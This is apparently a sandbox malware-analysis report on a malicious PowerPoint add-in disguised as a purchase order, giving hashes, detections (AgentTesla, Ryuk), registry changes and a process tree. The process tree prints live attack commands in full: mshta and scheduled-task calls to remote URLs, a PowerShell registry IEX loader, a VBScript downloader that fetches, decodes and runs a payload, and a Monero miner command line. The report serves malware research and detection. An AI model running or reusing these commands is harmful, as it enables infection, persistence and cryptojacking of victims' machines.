Resubmissions
25-08-2021 09:54
210825-79rzfjvlw2 1025-08-2021 09:51
210825-tbz8595366 1028-04-2021 22:50
210428-csmgr8bxe2 10Analysis
-
max time kernel
147s -
max time network
153s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
28-04-2021 22:50
Static task
static1
Behavioral task
behavioral1
Sample
PO - CE AUSTRALIA PTY LTD.ppam
Resource
win7v20210410
Behavioral task
behavioral2
Sample
PO - CE AUSTRALIA PTY LTD.ppam
Resource
win10v20210408
General
-
Target
PO - CE AUSTRALIA PTY LTD.ppam
-
Size
10KB
-
MD5
7c629522213c57c3b3d66ee8e6c13fed
-
SHA1
352b55636c67a5cd27a998888df0a137ef5433d8
-
SHA256
a2e98dd3fa146e70b06e95d0cbbf9a831a04e94572a229e6d554372cb6943c04
-
SHA512
385fbe8c518741e20daf5a62ac6e772d9d7b813e53e2a02b75f32287711c5ca316e162d24b04f48c1a90d799314f330fdc564a3494a27fa3811c1eb87571563b
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\74AX7LAV\5940e4_39e7aca5ca73408f9ea38510ed3aa48e[1].txt
ryuk
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 4372 4656 mshta.exe 67 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3928 804 powershell.exe 77 -
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
AgentTesla Payload 1 IoCs
resource yara_rule behavioral2/memory/4000-186-0x0000000000437DCE-mapping.dmp family_agenttesla -
Blocklisted process makes network request 27 IoCs
flow pid Process 31 4372 mshta.exe 33 4372 mshta.exe 35 4372 mshta.exe 37 4372 mshta.exe 39 4372 mshta.exe 41 4372 mshta.exe 43 4372 mshta.exe 45 4372 mshta.exe 47 4372 mshta.exe 49 4372 mshta.exe 51 4372 mshta.exe 52 4372 mshta.exe 53 4372 mshta.exe 54 4372 mshta.exe 56 4372 mshta.exe 59 3928 powershell.exe 61 3928 powershell.exe 65 3928 powershell.exe 68 1776 mshta.exe 69 1776 mshta.exe 70 1776 mshta.exe 71 1776 mshta.exe 72 1776 mshta.exe 74 4300 WScript.exe 76 4300 WScript.exe 78 4300 WScript.exe 80 4300 WScript.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts aspnet_compiler.exe -
Executes dropped EXE 1 IoCs
pid Process 576 bin.txt -
resource yara_rule behavioral2/memory/4600-219-0x0000000140000000-0x0000000140717000-memory.dmp upx -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography = "\"mshta\"\"http://1230948%[email protected]/p/19.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"mshta\"\"http://1230948%[email protected]/p/19.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "\"mshta\"\"http://1230948%[email protected]/p/19.html\"" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\replcia = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).nasdnasndnad)|IEX\"\", 0 : window.close\")" mshta.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\DLESOLCRETSAM = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).MSOFFICELO)|IEX\"\", 0 : window.close\")" mshta.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\taskschd.msc mmc.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3928 set thread context of 4000 3928 powershell.exe 92 PID 576 set thread context of 4600 576 bin.txt 100 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 2148 4372 WerFault.exe 82 -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2648 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE -
Kills process with taskkill 1 IoCs
pid Process 4568 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings cmd.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 WScript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e WScript.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4656 POWERPNT.EXE -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 2148 WerFault.exe 3928 powershell.exe 3928 powershell.exe 4000 aspnet_compiler.exe 4000 aspnet_compiler.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4152 mmc.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 4000 aspnet_compiler.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3928 powershell.exe Token: SeDebugPrivilege 4568 taskkill.exe Token: SeIncreaseQuotaPrivilege 3928 powershell.exe Token: SeSecurityPrivilege 3928 powershell.exe Token: SeTakeOwnershipPrivilege 3928 powershell.exe Token: SeLoadDriverPrivilege 3928 powershell.exe Token: SeSystemProfilePrivilege 3928 powershell.exe Token: SeSystemtimePrivilege 3928 powershell.exe Token: SeProfSingleProcessPrivilege 3928 powershell.exe Token: SeIncBasePriorityPrivilege 3928 powershell.exe Token: SeCreatePagefilePrivilege 3928 powershell.exe Token: SeBackupPrivilege 3928 powershell.exe Token: SeRestorePrivilege 3928 powershell.exe Token: SeShutdownPrivilege 3928 powershell.exe Token: SeDebugPrivilege 3928 powershell.exe Token: SeSystemEnvironmentPrivilege 3928 powershell.exe Token: SeRemoteShutdownPrivilege 3928 powershell.exe Token: SeUndockPrivilege 3928 powershell.exe Token: SeManageVolumePrivilege 3928 powershell.exe Token: 33 3928 powershell.exe Token: 34 3928 powershell.exe Token: 35 3928 powershell.exe Token: 36 3928 powershell.exe Token: SeIncreaseQuotaPrivilege 3928 powershell.exe Token: SeSecurityPrivilege 3928 powershell.exe Token: SeTakeOwnershipPrivilege 3928 powershell.exe Token: SeLoadDriverPrivilege 3928 powershell.exe Token: SeSystemProfilePrivilege 3928 powershell.exe Token: SeSystemtimePrivilege 3928 powershell.exe Token: SeProfSingleProcessPrivilege 3928 powershell.exe Token: SeIncBasePriorityPrivilege 3928 powershell.exe Token: SeCreatePagefilePrivilege 3928 powershell.exe Token: SeBackupPrivilege 3928 powershell.exe Token: SeRestorePrivilege 3928 powershell.exe Token: SeShutdownPrivilege 3928 powershell.exe Token: SeDebugPrivilege 3928 powershell.exe Token: SeSystemEnvironmentPrivilege 3928 powershell.exe Token: SeRemoteShutdownPrivilege 3928 powershell.exe Token: SeUndockPrivilege 3928 powershell.exe Token: SeManageVolumePrivilege 3928 powershell.exe Token: 33 3928 powershell.exe Token: 34 3928 powershell.exe Token: 35 3928 powershell.exe Token: 36 3928 powershell.exe Token: SeDebugPrivilege 2148 WerFault.exe Token: SeDebugPrivilege 4000 aspnet_compiler.exe Token: 33 4152 mmc.exe Token: SeIncBasePriorityPrivilege 4152 mmc.exe Token: 33 4152 mmc.exe Token: SeIncBasePriorityPrivilege 4152 mmc.exe Token: 33 4152 mmc.exe Token: SeIncBasePriorityPrivilege 4152 mmc.exe Token: 33 4152 mmc.exe Token: SeIncBasePriorityPrivilege 4152 mmc.exe Token: 33 4152 mmc.exe Token: SeIncBasePriorityPrivilege 4152 mmc.exe Token: 33 4152 mmc.exe Token: SeIncBasePriorityPrivilege 4152 mmc.exe Token: 33 4152 mmc.exe Token: SeIncBasePriorityPrivilege 4152 mmc.exe Token: 33 4152 mmc.exe Token: SeIncBasePriorityPrivilege 4152 mmc.exe Token: 33 4152 mmc.exe Token: SeIncBasePriorityPrivilege 4152 mmc.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 4656 POWERPNT.EXE 4656 POWERPNT.EXE 4656 POWERPNT.EXE 4372 mshta.exe 4152 mmc.exe 4152 mmc.exe 4000 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 4656 wrote to memory of 4372 4656 POWERPNT.EXE 82 PID 4656 wrote to memory of 4372 4656 POWERPNT.EXE 82 PID 4372 wrote to memory of 2648 4372 mshta.exe 85 PID 4372 wrote to memory of 2648 4372 mshta.exe 85 PID 4372 wrote to memory of 4568 4372 mshta.exe 87 PID 4372 wrote to memory of 4568 4372 mshta.exe 87 PID 3928 wrote to memory of 3948 3928 powershell.exe 91 PID 3928 wrote to memory of 3948 3928 powershell.exe 91 PID 3928 wrote to memory of 3948 3928 powershell.exe 91 PID 3928 wrote to memory of 4000 3928 powershell.exe 92 PID 3928 wrote to memory of 4000 3928 powershell.exe 92 PID 3928 wrote to memory of 4000 3928 powershell.exe 92 PID 3928 wrote to memory of 4000 3928 powershell.exe 92 PID 3928 wrote to memory of 4000 3928 powershell.exe 92 PID 3928 wrote to memory of 4000 3928 powershell.exe 92 PID 3928 wrote to memory of 4000 3928 powershell.exe 92 PID 3928 wrote to memory of 4000 3928 powershell.exe 92 PID 1496 wrote to memory of 1776 1496 mshta.exe 95 PID 1496 wrote to memory of 1776 1496 mshta.exe 95 PID 1776 wrote to memory of 3120 1776 mshta.exe 96 PID 1776 wrote to memory of 3120 1776 mshta.exe 96 PID 3120 wrote to memory of 4300 3120 cmd.exe 98 PID 3120 wrote to memory of 4300 3120 cmd.exe 98 PID 4300 wrote to memory of 576 4300 WScript.exe 99 PID 4300 wrote to memory of 576 4300 WScript.exe 99 PID 576 wrote to memory of 4600 576 bin.txt 100 PID 576 wrote to memory of 4600 576 bin.txt 100 PID 576 wrote to memory of 4600 576 bin.txt 100 PID 576 wrote to memory of 4600 576 bin.txt 100 PID 576 wrote to memory of 4600 576 bin.txt 100 PID 576 wrote to memory of 4600 576 bin.txt 100 PID 576 wrote to memory of 4600 576 bin.txt 100
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\PO - CE AUSTRALIA PTY LTD.ppam" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Windows\SYSTEM32\mshta.exemshta http://www.j.mp/llsoaskokcdokoktewelvw2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4372 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%[email protected]/p/19.html""\"", 0 : window.close"\")3⤵
- Creates scheduled task(s)
PID:2648
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im Excel.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4568
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4372 -s 30483⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2148
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -noexit ((gp HKCU:\Software).MSOFFICELO)|IEX1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd2⤵PID:3948
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe#cmd2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4000
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s1⤵
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4152
-
\??\c:\windows\system32\mshta.exemshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta http://1230948%[email protected]/p/19.html"", 0 : window.close")1⤵
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http://1230948[email protected]/p/19.html2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>lulupupugugugagamotherfucker.vbs &@echo dim stream_obj >>lulupupugugugagamotherfucker.vbs &@echo dim shell_obj >>lulupupugugugagamotherfucker.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>lulupupugugugagamotherfucker.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>lulupupugugugagamotherfucker.vbs &@echo set shell_obj = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B") >>lulupupugugugagamotherfucker.vbs &@echo URL = "https://5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com/ugd/5940e4_39e7aca5ca73408f9ea38510ed3aa48e.txt">>lulupupugugugagamotherfucker.vbs &@echo http_obj.open "GET", URL, False >>lulupupugugugagamotherfucker.vbs &@echo http_obj.send >>lulupupugugugagamotherfucker.vbs &@echo stream_obj.type = 1 >>lulupupugugugagamotherfucker.vbs &@echo stream_obj.open >>lulupupugugugagamotherfucker.vbs &@echo stream_obj.write http_obj.responseBody >>lulupupugugugagamotherfucker.vbs &@echo stream_obj.savetofile "C:\Users\Public\scan.txt", 2 >>lulupupugugugagamotherfucker.vbs &@echo Dim xxx >>lulupupugugugagamotherfucker.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>lulupupugugugagamotherfucker.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\scan.txt", 1) >>lulupupugugugagamotherfucker.vbs &@echo content = file.ReadAll >>lulupupugugugagamotherfucker.vbs &@echo content = StrReverse(content) >>lulupupugugugagamotherfucker.vbs &@echo Dim fso >>lulupupugugugagamotherfucker.vbs &@echo Dim fdsafdsa >>lulupupugugugagamotherfucker.vbs &@echo Dim oNode, fdsaa >>lulupupugugugagamotherfucker.vbs &@echo Const adTypeBinary = 1 >>lulupupugugugagamotherfucker.vbs &@echo Const adSaveCreateOverWrite = 2 >>lulupupugugugagamotherfucker.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>lulupupugugugagamotherfucker.vbs &@echo oNode.dataType = "bin.base64">>lulupupugugugagamotherfucker.vbs &@echo oNode.Text = content >>lulupupugugugagamotherfucker.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>lulupupugugugagamotherfucker.vbs &@echo fdsaa.Type = adTypeBinary >>lulupupugugugagamotherfucker.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.txt") >>lulupupugugugagamotherfucker.vbs &@echo LocalFile = tempdir >>lulupupugugugagamotherfucker.vbs &@echo fdsaa.Open >>lulupupugugugagamotherfucker.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>lulupupugugugagamotherfucker.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>lulupupugugugagamotherfucker.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>lulupupugugugagamotherfucker.vbs &@echo Set fdsafdsa = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B") >>lulupupugugugagamotherfucker.vbs &@echo If (fso.FileExists(LocalFile)) Then >>lulupupugugugagamotherfucker.vbs &@echo fdsafdsa.Exec (LocalFile) >>lulupupugugugagamotherfucker.vbs &@echo End If >>lulupupugugugagamotherfucker.vbs& lulupupugugugagamotherfucker.vbs &dEl lulupupugugugagamotherfucker.vbs3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\lulupupugugugagamotherfucker.vbs"4⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Users\Public\bin.txtC:\Users\Public\bin.txt5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:576 -
C:\Windows\explorer.exeC:\Windows\explorer.exe -B --donate-level=1 -a cryptonight --url=pool.supportxmr.com:5555 -u 8AsWuFbYMBQQFKBWQDAMiqgZnQLSQjB7p6hrYwxdocCvFdgJjYjckDiLGTEzwGRidoTZjnobmuwChgcNawxgur9f7i9fb88 -p x -R --variant=-1 -t 1 --max-cpu-usage=506⤵PID:4600
-
-
-
-
-